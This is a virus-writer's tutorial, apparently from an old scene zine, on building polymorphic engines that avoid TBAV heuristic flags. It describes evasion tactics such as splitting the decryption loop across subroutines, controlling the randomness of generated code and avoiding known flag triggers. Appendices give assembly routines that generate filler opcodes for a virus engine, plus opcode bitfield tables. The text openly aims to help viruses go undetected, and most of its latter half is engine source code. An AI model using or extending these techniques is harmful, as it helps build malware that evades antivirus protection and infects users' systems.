A Humble PolyMorphic Engine Primer by Absolute Overlord Foreward Since I've done a tremendous amount of research into avoiding flags with a polymorphic engine I've decided to document my research and present it for the benefit of others persuing the same. The benefits of using a polymorphic engine are excellent provided your engine achieves the requisite level of 'cleanliness' as far as heuristical flags go. The majority of polymorphic viruses have been stopped dead in their tracks due to the absurd level of flags they have been known to cause. If all of a sudden programs you knew which didn't have any flags scan as: G Garbage instructions. Contains code that seems to have no purpose other than encryption or avoiding recognition by virus scanners. @ Encountered instructions which are not likely to be generated by an assembler, but by some code generator like a polymorphic virus. 1 Found instructions which require a 80186 processor or above. # Found a code decryption routine or debugger trap. This is common for viruses but also for some copy-protected software. Then you know you have a virus. Of course if your virus does things like scramble the keyboard buffer or print 'FUCK YOU' on the screen every ten seconds none of this discussion is really going to be worth your while. ;) First, the good news. Web and Avp *suck* next to tbav, and frankly the only scanner to use in your test bed is TBAV. Now the bad news. TBAV is damn good at catching all kinds of garbage code and finding decryption loops. The main thing to know here is that 1 flag is bad but 2 spells a catastrophe. This is because if tbav finds 2 flags on a file while scanning with high heuristics it will pop up the ubiquitious red warning window and summarily decide the file is infected. First, the decryption loop. In even the best polymorphic engines I've seen tbav finds the decryptor loop 5 times out of 10. It's hard to state the exact reason this is but it evens finds the decryptor loop in Rhincewind's Rhince engine droppers. This is peculiar because Rhince uses a very slick method of inserting a number of mov [memlocation], opcode instructions. The decryptor is actually laid down at the end of the 'header' while the header is executing. A fantastic idea, but nevertheless one that fails to elude tbav. Dark Slayer uses the method of xor [si,di,bp or bx], seed but tbav will catch this as well about 50% of the time. I hypothesized that if I spread the individual instructions for the decryptor loop over a number of subroutines that formed the actual loop tbav would fail to find it. I was right. So this is the method I use now in S.H.I.T. Of course, eventually tbav will be able to detect even this as well. I think tbav tries to keep track of memory pointed to by the index registers and watches for successive memory location changes. Hard to tell. One thing is certain though. A polymorphic engine must make a good show of attempting to hide the decryptor or the whole point is lost. You certainly can't have 50 files suddenly flagging as having a decryptor that didn't flag so before. Second, the dreaded @ polymorph engine flag. This one is not so hard to pin down. Almost all single byte opcodes like DAA, AAD, LOCK and other oddities you would rarely use in a program will trigger it. Addressing modes like mov dx,[bp+di+3425h] will trigger it. Lots of adc's, sub's ,cmp's, dec's and inc's will trigger it. Register operations involving bp, di, si,and sp will move you towards a trigger (but not gaurantee one). Any incidence of an opcode like mov al,ah where the direction bit is set will trigger the @ flag. Due to the way the opcode bit fields where designated there is a set of 'mirror' opcodes that perform the same function but with the register fields reversed and the direction bit set instead of clear (see appendix A). The same holds true for the xchg group of instructions. I believe that tbav uses a combination of a mathematical approach to counting the incidence of opcodes and addressing modes and computing the statistical likelihood of their occurrences as well as looking for specific opcodes and opcode sequences. This is a good reason that code produced by engines like PSE,MIME,MTE,TPE,PME,DSCE,DSME and VICE will give lots and lots of flags. If we count the incidence of each opcode and then do a frequency analysis on them we can come up with a fairly decent picture of your average program versus the kind of garbage produced by most poly engines. To be honest, it seems the only opcodes you can get away with and still gaurentee no @ flag is mov's, xchg's and push/pop pairs. That leaves the entire slew of mathematical and logical instructions to be re-explored however. That also leaves the standard flow control (CMP/JZ) pairs. I tested one version of shit that was getting 0 flags by adding cmp/jz/jnz/jo etc random flow control and started getting flags. Hard to pin down the cause here. Which leads us to the issue of the G garbage flag. Tbav is fairly intelligent and will flag G on almost any sequence of instructions that look like garbage to the naked eye so you really have to avoid producing code that looks like utter nonsense. The majority of actual program code consists of 1 moves to registers from memory (setup) 2 moves to registers of immediate values 3 moves to memory of registers or immediate values 4 moves to registers of registers 5 pushes and pops to move registers to other registers 6 occasional interupts to various system services 7 compares with branches 8 logical instructions like and,or,ror,sal etc 9 mathemetical instructions like add,sub (pretty rare actually) I think that item number 6 needs more looking into. If I start debugging and see 200 bytes go by without a single Int21 or Int10 or *SOMETHING* I think I would be pretty suspicious. I bet TBAV assumes the same here. Basically,if the code looks completely absurd with debug then I'm 100% positive tbav will flag it as something as well. The U undocumented interupt flag. There's no denying the fact that TBAV has a flaw in it. It will sometimes produce this flag even when there are no such Int's in the tested code. Either that or there is a slim (but intentional?) random chance that mov ax,4C00h Int 21h will be flagged as undocumented. Maybe Franz wants an extra margin of safety.?:) The J suspicious jump construct flag. Programs like SMEG and others that overindulge in random flow control will cause this. Pare down the level of random flow control. The main thing I have noticed is that in most engines there is a total lack of control in the 'randomocity' of the code generated. You have to control it. Make it far less random. Make it look much more like the genuine article. (Speaking of which, I'm sure I'm not the first person to think of 'code theiving'. Actually going out and trying to find some chunk of code in the host or something to plunk down as our new entry header. I wonder if this could be done..) You might be better off avoiding random flow control entirely and lightening up your engine a bit in the process. The R Terminate and stay resident flag. This technically shouldn't be a flag any polymorphic engine should have to worry about but alas, Franz has an itchy trigger finger. You may occasionally see this if you have the instruction mov [si],bx anywhere in your code. Actually, this brings us to the point of the 'known flags' triggers. Here is a partial list: cmp ah,4Bh ; program infects on execution. cmp ah,11h ;stealth virus flag cmp ah,12h ;ditto cmp ah,42h ;ditto cmp ah,43h ;ditto mov ah,40h ;program may be capable of infecting a file. Int 27h ;tsr ;) mov ah,37h ;tsr ..... int 21h ============================================================================ Appendix A ; I have taken the liberty of assembling some routines that use the bit ; field patterns of opcodes to produce opcodes of a limited type each ; These may help you in creating your own variants. ; The actual engine must still create the framework that is padded out ; with the 'filler'. The following routines total 299 bytes including ; random number generators and local variables. ; they assume ds:di is the destination for the garbage opcodes ; and use destroy the contents of ax and bx padit: ; lay down between 2 and 5 filler opcodes selected from the available ; types call get_rnd ;get a random number for fill count and ax,03h ; inc ax inc ax ;min 2,max 5 opcodes do_cx_rnd: push ax new_fill: mov ax, (end_op_table-op_table)/2 ;select the type of call rand_in_range ;filler cmp ax,word ptr [last_fill_type] jz new_fill ;avoid same types in a row mov word ptr [last_fill_type],ax add ax,ax mov bx,ax call word ptr cs:[op_table+bx] pop ax dec ax jnz do_cx_rnd ret ; 38 bytes op_table: dw offset move_with_mem ;here we can weight the frequencies dw offset move_with_reg ;a bit by inserting a subroutine dw offset move_imm ;more than once dw offset reg_exchange dw offset do_push_pop end_op_table: last_fill_type dw 0 shit_range dw 0 shit_range_base dw 0 ; 16 bytes move_imm: ; makes an opcode of type mov reg,immediate value ; either 8 or 16 bit value ; but never ax or al or sp,di,si or bp call get_rnd and al,0Fh ;get a reggie or al,0B0h ;make it a mov reg, test al,00001000b jz is_8bit_mov and al,11111011b ; make it ax,bx cx or dx mov ah,al and ah,03h jz move_imm ;not ax or al! stosb call rand_16 stosw ret is_8bit_mov: mov bh,al ; and bh,07h ; is al? jz move_imm ; yeah bomb stosb call get_rnd stosb ret ;37 bytes move_with_mem: ; ok now we get busy with type mov reg,[mem] and type mov [mem],reg ; but never move ax,[mem] or mov al,[mem] ; or any moves involving bp,sp,di or si ; note: ; shit_range_base is a pointer to mem ok to mess with in the new ; host + virus combo. This would be somewhere in the current segment ; after the virus code and below the reserved stack area. ; shit_range is typically (65536 - stack_allocation) - shit_range_base ; shit_range_base is typically host_size+virus_size+safety_margin call rand_16 and ax,0011100000000011b ;preserve reggie,from/to mem and 8/16 bit or ax,0000011010001000b ;or it with addr mode imm 16 and make it mov test al,00000001b jnz is_16bitter cmp ah,00000110b ;reggie = al? jz make_to_mem jmp all_clear_for_mem is_16bitter: and ah,00011110b ;make it ax,bx,cx or dx cmp ah,00000110b ;is reggie = ax? jnz all_clear_for_mem ;yes, make it to mem make_to_mem: and al,11111101b ; make it to mem all_clear_for_mem: stosw mov ax,[shit_range] ;this will be zero if there not enuff room to define or ax,ax jnz shit_ok dec di dec di ret ;there is no shit range defined so abort! shit_ok: xor ah,ah call rand_in_range add ax,[shit_range_base] stosw ret ; 54 bytes move_with_reg: ; ok now we knock boots with mov reg,reg's ; but never to al or ax. call rand_16 and ax,0011111100000001b ;preserve reggies and 8/16 bit or ax,1100000010001010b ;or it with addr mode and make it mov reg_test: test al,1 jz is_8bit_move_with_reg and ah,11011011b ;make source and dest = ax,bx,cx,dx is_8bit_move_with_reg: mov bl,ah and bl,00111000b jz move_with_reg ;no mov ax, 's please mov bh,ah ;let's see if 2 reggies are same reggies. sal bh,1 sal bh,1 sal bh,1 and bh,00111000b cmp bh,bl ;reg,reg are same? jz move_with_reg ;dho! stosw ret ; 39 bytes reg_exchange: ; modify a mov reg,reg into an xchg reg,reg call move_with_reg ;make a mov reg,reg dec di ;but then remove it dec di ;and take advantage of the fact the opcode is still in ax test al,1b ;was a 16 bit type? jnz reg_exchange ;yeah go for an 8 bitter mov bh,ah and bh,07h ;is one of reggies ax? jz reg_exchange ;yah so bomb mov al,10000110b ;else make it xchg ah,dl etc. stosw ret ; 19 bytes ; we can get slick and use the above routines to create a mov instruction ; and then modify it into a math or cmp preserving the pre assembled ; addressing mode make_math_with_mem: call mov_with_mem push di sub di,4 mov al,byte ptr [di] and al,00000011b ;preserve the pertinent address mode info push ax call get_rnd and al,00111000b ;weed out a new opcode like sub,add etc.. pop bx or al,bl ;set the address mode bits mov byte ptr [di],al ;a new instruction is born! pop di ;restore our pointer ret ; 26 bytes :) do_push_pop: ; we don't have to watch our stack if we pair up pushes with pops ; so I slapped together this peice of shoddy work to add em. mov ax,(end_bytes_2-bytes_2)/2 call rand_in_range add ax,ax mov bx,ax mov ax,word ptr [bytes_2+bx] stosw ret bytes_2: push ax pop dx push ax pop bx push ax pop cx push bx pop dx push bx pop cx push cx pop bx push cx pop dx end_bytes_2: ; 31 bytes ; the following random number gen routines where originated by rhincewind ; his random in range routine is great :) rand_in_range: push bx ;returns a random num between 0 and entry ax push dx xchg ax,bx call get_rnd xor dx,dx div bx xchg ax,dx ;dx=remainder pop dx pop bx ret get_rnd: ; simple timer based random numbers but with a twist using xor of last one ; also originated by RhinceWind. in ax,40h xor ax, 0FFFFh org $-2 Randomize dw ? mov [Randomize],ax ret rand_16: ; a small variation to compensate for lack of randomocity in the ; high byte of 16 bit result returned by get_rnd call get_rnd mov bl,al call get_rnd mov ah,bl ret ;39 ============================================================================ Appendix B Instruction Bitfeild Layouts Section 1 - 8 basic arithmetic intructions bit feild layout. Covers reg,mem mem,reg and reg,reg but not immediates. first byte second byte - register and address mode op mode dest source / \ / \ / \ / \ 7 6 5 4 3 2 1 0 7 6 5 4 3 2 1 0 0 0 | 0 | | | | | | | 1 = 16 bit | | 0 0 0 = [BX+SI+] if index mode | | 0 = 8 bit | | 0 0 1 = [BX+DI+] | 1 = to reg | | 0 1 0 = [BP+SI+] | 0 = to mem | | 0 1 1 = [BP+DI+] | | | 1 0 0 = [SI+] 0 0 0 = add | | 1 0 1 = [DI+] 0 0 1 = or | | 1 1 0 = [BP+] 0 1 0 = adc | | 1 1 1 = [BX+] 0 1 1 = sbb | 0 0 0 = AX (al) register map 1 0 0 = and | 0 0 1 = CX (cl) 1 0 1 = sub | 0 1 0 = DX (dl) 1 1 0 = xor | 0 1 1 = BX (bl) 1 1 1 = cmp | 1 0 0 = SP (ah) | 1 0 1 = BP (ch) | 1 1 0 = SI (dh) | 1 1 1 = DI (bh) 0 0 - register index only (unless bp) If index reg is [bp+] then 0 0 = [1000h] 16 bit long only (there is no [bp] only mode) 0 1 - immediate is 8 bit short adrress 1 0 - immediate is 16 bit long address 1 1 register to register source bits are second register using same encoding as destination reg above. ; Note : If bit 2 of first byte is 1 then it is type immediate value to ; register : bit 1 (direction bit) will always be a ; zero, bit 0 specifies immediate to an 8 bit register with a single ; byte operand (0) or immediate to an 8 bit register with a word operand(1). ; byte 2 has the destination register using the above encoding only ; moved to the low 3 bits with bits 3,4,5 clear and bits 6 and 7 always ; set. ; operations of type add [memlocation], immediate are in the special ; 'FF' family to be described later. Section 2 ,the 'HiBit' series. Note bits 1 and 0 of first byte and second byte (addressing mode) is the same as above. first byte op second byte - same as above / \ 7 6 5 4 3 2 1 0 1 0 | 0 x x - see above 0 0 0 - Mov 0 0 1 - 0 1 0 - 0 1 1 - 1 0 0 - 1 0 1 - 1 1 0 - 1 1 1 - Section 3 - The '40' series Pushes and pops 7 6 5 4 3 2 1 0 0 0 0 1 x x x x | | | 0 0 0 Ax | 0 0 1 bx | 0 1 0 cx | 0 1 1 dx | 1 0 0 bp | 1 0 1 sp | 1 1 0 si | 1 1 1 di | 0 Push 1 Pop